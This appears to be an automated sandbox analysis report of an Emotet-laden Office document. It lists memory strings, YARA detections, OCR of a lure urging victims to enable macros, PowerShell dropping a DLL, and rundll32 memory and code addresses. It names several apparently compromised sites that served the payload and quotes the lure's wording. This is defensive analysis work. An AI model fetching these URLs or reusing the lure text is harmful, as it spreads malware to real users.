                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: powershell.exe, 00000005.00000002.2104542311.000000001B568000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: powershell.exe, 00000005.00000002.2104542311.000000001B568000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: powershell.exe, 00000005.00000002.2096214706.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098993097.0000000002930000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2106930484.000000001D360000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2096214706.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2098993097.0000000002930000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2101133353.0000000002800000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in binary or memory: http://www.greaudstudio.com/docs/FGn/
                      Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in binary or memory: http://zhongshixingchuang.com/wp-admin/OTm/
                      Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmpString found in binary or memory: https://dagranitegiare.com
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in binary or memory: https://dagranitegiare.com/wp-admin/jCH/
                      Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmpString found in binary or memory: https://dagranitegiare.com/wp-admin/jCH/P
                      Source: powershell.exe, 00000005.00000002.2104542311.000000001B568000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in binary or memory: https://suriagrofresh.com/serevers/MVDjI/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000D.00000002.2107396520.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2110398368.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2116797461.0000000000241000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2096970876.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2115599459.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2117982629.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2109063945.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2119357685.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2119622142.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2111825774.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2106262075.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2099926310.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2096914563.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2101765881.0000000000380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2340256128.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2116722634.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2114509777.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2106324425.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2107481721.0000000000271000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2102126340.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2109311078.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2098614058.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2115515890.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2110449108.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.2340299348.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2111379658.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2104432048.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2112781358.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2113001666.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2098670665.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2114590514.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2099888213.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2104402194.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2118123404.0000000000201000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 19.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd"
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd" N@m 13 ;a 10096 G) FI
                      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. . . . . '% O a S
                      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. . . . . '% O a S
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 7688
                      Source: unknownProcess created: Commandline size = 7597
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7597
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Bjbj\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D270
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011EA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012750
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012B5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001237C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012F7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C6C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C4121
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D4DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DC19B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C6E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D533C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CFB04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C9716
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CE360
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DA7E4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C83F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C4828
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D0C65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D5060
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D1C79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CF471
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C884A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CD04B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CC8A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DD08F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CF099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DA094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CB0E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D68CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C792C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CE924
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D5D36
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C5D0E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D2513
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D8978
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DC95E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C4D5F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C81A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C59B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DB19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C8994
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D39E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C1600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D3600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C3618
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C766F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CD668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D2A7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D8E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C427A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D7A50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D72AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D0EA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C6ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C12B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DA2EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C7AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D9AE2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CD2CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CDEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D76D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D12D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CBB28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D0705
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D8313
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D5B60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D5748
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D3745
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C2746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C6342
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CDB5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C8F55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C67AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C3FAB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CB3A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CFFB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DCBB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CEF80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C3B97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CB7F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C33F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CC3C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A4460
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A0065
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A1079
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069E871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069C44B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00697C4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00693C28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00696005
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069A4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A5CCB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069BCA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006AC48F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069E499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A9494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A7D78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006ABD5E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069415F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00696D2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00693521
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069DD24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A5136
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069510E
